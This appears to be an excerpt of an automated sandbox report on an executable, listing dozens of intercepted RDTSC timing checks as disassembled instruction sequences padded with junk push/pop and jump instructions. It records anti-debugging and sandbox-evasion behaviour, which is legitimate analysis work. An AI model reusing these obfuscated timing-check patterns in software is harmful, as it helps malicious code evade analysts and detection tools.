                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E51C5 second address: 13E51CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7FC0 second address: 13E7FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BE4F53h 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7FD8 second address: 13E7FEE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnc 00007F2A68BD69D8h 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7FEE second address: 13E800D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BE4F59h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E85AA second address: 13E85AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E85AE second address: 13E8617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2A68BE4F4Eh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F2A68BE4F48h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push 00000000h 0x0000002d jmp 00007F2A68BE4F4Ch 0x00000032 xchg eax, esi 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F2A68BE4F58h 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433000 second address: 143302E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F2A68BE4F4Eh 0x0000000c jmp 00007F2A68BE4F4Fh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F2A68BE4F4Eh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143302E second address: 1433038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433038 second address: 143303C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143303C second address: 1433040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1433040 second address: 143304C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2A68BE4F46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143304C second address: 143306A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BD69E8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143306A second address: 143306E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1431986 second address: 143198A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143198A second address: 1431995 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F2A68BE4F46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143209F second address: 14320D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2A68BD69D6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jnc 00007F2A68BD69DEh 0x00000013 pushad 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F2A68BD69E2h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E0E9C second address: 13E0EF3 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2A68BE4F46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F2A68BE4F48h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov edi, dword ptr [ebp+122D35DDh] 0x0000002c push 00000004h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F2A68BE4F48h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 and ecx, 23F095C8h 0x0000004e nop 0x0000004f push ecx 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1432387 second address: 14323A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69E9h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14323A6 second address: 14323AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14363E5 second address: 14363F3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2A68BD69D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14363F3 second address: 14363FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2A68BE4F46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14363FD second address: 143640D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2A68BD69D6h 0x00000008 jg 00007F2A68BD69D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143640D second address: 1436412 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436412 second address: 1436433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F2A68BD69D6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c jg 00007F2A68BD69D6h 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436433 second address: 143643C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143643C second address: 1436442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436442 second address: 1436447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1436447 second address: 143644C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14366C6 second address: 14366CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A9D8 second address: 143A9DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A9DE second address: 143A9E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A9E2 second address: 143AA33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69E8h 0x00000007 jmp 00007F2A68BD69E8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F2A68BD69E4h 0x00000013 pushad 0x00000014 jnp 00007F2A68BD69D6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143AA33 second address: 143AA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2A68BE4F57h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jl 00007F2A68BE4F46h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A176 second address: 143A183 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2A68BD69D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A183 second address: 143A1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jmp 00007F2A68BE4F50h 0x0000000b jo 00007F2A68BE4F46h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A1A1 second address: 143A1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A275 second address: 143A27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A27B second address: 143A281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A281 second address: 143A2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F2A68BE4F46h 0x0000000c jmp 00007F2A68BE4F56h 0x00000011 jmp 00007F2A68BE4F4Ch 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A2B6 second address: 143A2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A406 second address: 143A427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F2A68BE4F46h 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F2A68BE4F4Dh 0x00000013 push eax 0x00000014 pop eax 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 143A427 second address: 143A42C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1442850 second address: 1442858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1442858 second address: 144285C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144285C second address: 1442860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1441D0F second address: 1441D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1441D17 second address: 1441D36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BE4F59h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1442270 second address: 1442276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1442276 second address: 144227A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144227A second address: 144228B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jg 00007F2A68BD69DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144228B second address: 1442299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007F2A68BE4F46h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1442299 second address: 144229D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144657A second address: 144657E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144657E second address: 14465B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d jmp 00007F2A68BD69E2h 0x00000012 popad 0x00000013 jng 00007F2A68BD6A19h 0x00000019 jc 00007F2A68BD69F4h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14465B5 second address: 14465EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BE4F58h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F2A68BE4F53h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14456B1 second address: 14456C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F2A68BD69D8h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14456C1 second address: 14456C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14456C7 second address: 14456CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445AFC second address: 1445B00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445B00 second address: 1445B0C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2A68BD69D6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445B0C second address: 1445B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F2A68BE4F46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445E2E second address: 1445E4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F2A68BD69E6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445E4A second address: 1445E63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BE4F55h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1445E63 second address: 1445E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1446112 second address: 144612B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2A68BE4F4Fh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144612B second address: 1446131 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14462AF second address: 14462C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BE4F51h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14462C4 second address: 14462C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 144AE17 second address: 144AE69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F4Fh 0x00000007 je 00007F2A68BE4F46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2A68BE4F57h 0x00000014 pushad 0x00000015 jmp 00007F2A68BE4F53h 0x0000001a jnl 00007F2A68BE4F46h 0x00000020 pushad 0x00000021 popad 0x00000022 push edx 0x00000023 pop edx 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13994C9 second address: 1399518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BD69DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007F2A68BD69D6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F2A68BD69E8h 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c pop eax 0x0000001d je 00007F2A68BD69D6h 0x00000023 push edi 0x00000024 pop edi 0x00000025 popad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F2A68BD69DBh 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399518 second address: 1399525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2A68BE4F46h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399525 second address: 139952A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139952A second address: 1399545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2A68BE4F46h 0x0000000a jmp 00007F2A68BE4F4Ah 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399545 second address: 1399549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451984 second address: 145199F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2A68BE4F57h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145199F second address: 14519B5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2A68BD69D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F2A68BD6A07h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14519B5 second address: 14519BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 14519BB second address: 14519BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451CAF second address: 1451CBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2A68BE4F46h 0x0000000a pop edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451CBF second address: 1451CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 145227B second address: 1452285 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2A68BE4F46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1451166 second address: 145116C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1459807 second address: 1459811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2A68BE4F46h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1459811 second address: 1459826 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jc 00007F2A68BD69D6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1459AFF second address: 1459B3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F50h 0x00000007 jmp 00007F2A68BE4F4Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 je 00007F2A68BE4F46h 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d jmp 00007F2A68BE4F4Eh 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1467A71 second address: 1467A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BD69DEh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469C08 second address: 1469C19 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 jnp 00007F2A68BE4F66h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469C19 second address: 1469C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469C1D second address: 1469C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1469C23 second address: 1469C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F2A68BD69DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147B129 second address: 147B13B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A68BE4F4Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 147AFD3 second address: 147AFDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F2A68BD69D6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1483897 second address: 14838B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A68BE4F58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
